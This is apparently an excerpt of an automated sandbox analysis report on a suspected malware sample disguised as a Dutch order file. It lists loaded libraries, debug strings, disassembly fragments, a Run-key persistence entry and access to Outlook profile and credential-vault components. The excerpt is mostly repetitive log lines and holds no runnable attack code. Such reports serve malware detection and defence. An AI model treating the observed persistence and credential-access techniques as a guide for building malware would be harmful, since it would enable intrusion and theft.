                Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: version.dll, wininet.dll, kernel.appcore.dll, uxtheme.dll, ieframe.dll, iertutil.dll, netapi32.dll, userenv.dll, winhttp.dll, wkscli.dll, netutils.dll, sspicli.dll, windows.storage.dll, wldp.dll, profapi.dll, secur32.dll, mlang.dll, propsys.dll, winsqlite3.dll, vaultcli.dll, wintypes.dll, dpapi.dll, cryptbase.dll
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe | Section loaded: wininet.dll, mswsock.dll, dnsapi.dll, iphlpapi.dll, fwpuclnt.dll, rasadhlp.dll
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe | Section loaded: wininet.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, kernel.appcore.dll, uxtheme.dll, windows.storage.dll, wldp.dll, propsys.dll, profapi.dll, edputil.dll, windows.staterepositoryps.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, userenv.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
                Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe | Section loaded: vcruntime140.dll, wininet.dll, version.dll, urlmon.dll, msvcp140.dll, iertutil.dll, srvcli.dll, netutils.dll, kernel.appcore.dll, uxtheme.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                Source: C:\Windows\SysWOW64\wscript.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: Nieuwebestellingen10122024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: Nieuwebestellingen10122024.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: iexplore.pdbUGP source: wscript.exe, 0000000C.00000002.4501045338.0000000004EEC000.00000004.10000000.00040000.00000000.sdmp, wscript.exe, 0000000C.00000002.4499908466.0000000002CC8000.00000004.00000020.00020000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000000.2400868410.000000000277C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2664175943.000000003870C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: System.ni.pdbRSDS source: WER5822.tmp.dmp.8.dr
                Source: Binary string: Microsoft.CSharp.pdb source: WER5822.tmp.dmp.8.dr
                Source: Binary string: System.Windows.Forms.ni.pdb source: WER5822.tmp.dmp.8.dr
                Source: Binary string: wntdll.pdbUGP source: iexplore.exe, 00000005.00000002.2333103481.00000000033EE000.00000040.00001000.00020000.00000000.sdmp, iexplore.exe, 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, iexplore.exe, 00000005.00000003.2231798388.0000000002EFF000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 00000005.00000003.2234062433.00000000030A7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.4500264920.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.4500264920.0000000004A5E000.00000040.00001000.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.2327905828.0000000004560000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.2334874427.0000000004711000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Drawing.ni.pdb source: WER5822.tmp.dmp.8.dr
                Source: Binary string: wntdll.pdb source: iexplore.exe, iexplore.exe, 00000005.00000002.2333103481.00000000033EE000.00000040.00001000.00020000.00000000.sdmp, iexplore.exe, 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, iexplore.exe, 00000005.00000003.2231798388.0000000002EFF000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 00000005.00000003.2234062433.00000000030A7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, wscript.exe, 0000000C.00000002.4500264920.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.4500264920.0000000004A5E000.00000040.00001000.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.2327905828.0000000004560000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.2334874427.0000000004711000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wscript.pdb source: iexplore.exe, 00000005.00000003.2328045546.0000000000C95000.00000004.00000020.00020000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000B.00000002.4499330641.00000000010D8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER5822.tmp.dmp.8.dr
                Source: Binary string: System.Drawing.ni.pdbRSDS source: WER5822.tmp.dmp.8.dr
                Source: Binary string: System.Windows.Forms.pdb source: WER5822.tmp.dmp.8.dr
                Source: Binary string: System.pdb source: WER5822.tmp.dmp.8.dr
                Source: Binary string: System.Core.ni.pdb source: WER5822.tmp.dmp.8.dr
                Source: Binary string: wscript.pdbGCTL source: iexplore.exe, 00000005.00000003.2328045546.0000000000C95000.00000004.00000020.00020000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000B.00000002.4499330641.00000000010D8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: mscorlib.pdb source: WER5822.tmp.dmp.8.dr
                Source: Binary string: System.Drawing.pdbP/ source: WER5822.tmp.dmp.8.dr
                Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER5822.tmp.dmp.8.dr
                Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER5822.tmp.dmp.8.dr
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: tCyxXhRNgdPI.exe, 0000000B.00000000.2249922753.0000000000CDE000.00000002.00000001.01000000.00000007.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4499475516.0000000000CDE000.00000002.00000001.01000000.00000007.sdmp
                Source: Binary string: System.Dynamic.pdb source: WER5822.tmp.dmp.8.dr
                Source: Binary string: System.Management.pdb source: WER5822.tmp.dmp.8.dr
                Source: Binary string: System.Drawing.pdb source: WER5822.tmp.dmp.8.dr
                Source: Binary string: mscorlib.ni.pdb source: WER5822.tmp.dmp.8.dr
                Source: Binary string: System.Management.ni.pdb source: WER5822.tmp.dmp.8.dr
                Source: Binary string: System.Core.pdb source: WER5822.tmp.dmp.8.dr
                Source: Binary string: System.ni.pdb source: WER5822.tmp.dmp.8.dr
                Source: Binary string: System.Core.ni.pdbRSDS source: WER5822.tmp.dmp.8.dr
                Source: Binary string: iexplore.pdb source: wscript.exe, 0000000C.00000002.4501045338.0000000004EEC000.00000004.10000000.00040000.00000000.sdmp, wscript.exe, 0000000C.00000002.4499908466.0000000002CC8000.00000004.00000020.00020000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000000.2400868410.000000000277C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2664175943.000000003870C000.00000004.80000000.00040000.00000000.sdmp
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeCode function: 0_2_00007FF847152C45 push ss; retn 5F4Ch0_2_00007FF847176317
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeCode function: 0_2_00007FF8471500BD pushad ; iretd 0_2_00007FF8471500C1
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeCode function: 0_2_00007FF847155661 pushfd ; retf 0_2_00007FF847155991
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeCode function: 0_2_00007FF847155992 push edx; retf 0_2_00007FF8471559DB
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeCode function: 0_2_00007FF84726015E push esp; retf 4810h0_2_00007FF847260762
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_048F09AD push ecx; mov dword ptr [esp], ecx12_2_048F09B6
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_0036F465 push 2BE5A8CCh; ret 12_2_0036F46A
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_00370880 push ebx; ret 12_2_00370881
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_0036BA6A push eax; ret 12_2_0036BA74
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_0036DBC0 push es; iretd 12_2_0036DBC1
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_00363FC2 push ebx; iretd 12_2_00363FC5
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_047164CB push esp; retf 12_2_047164EA
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_04717516 push eax; iretd 12_2_04717527
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_04714627 push ds; retf 12_2_04714756
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_047146F6 push ds; retf 12_2_04714756
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_04725032 push eax; ret 12_2_04725034
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_047160E5 push ebx; iretd 12_2_047160E6
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_047251EC push eax; retf 12_2_047256D5
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_047163FC push esp; retf 12_2_047164EA
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exeCode function: 13_2_04BE449D pushfd ; retf 13_2_04BE44A1
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exeCode function: 13_2_04BE5833 push ebx; iretd 13_2_04BE5836
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exeCode function: 13_2_04BD895D push 82F4AA0Bh; ret 13_2_04BD8973
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exeCode function: 13_2_04BED2DB push eax; ret 13_2_04BED2E5
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exeCode function: 13_2_04BD82C7 push cs; retf 13_2_04BD82C9
                Source: C:\Windows\SysWOW64\wscript.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LDSP2VC8

                Hooking and other Techniques for Hiding and Protection

                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
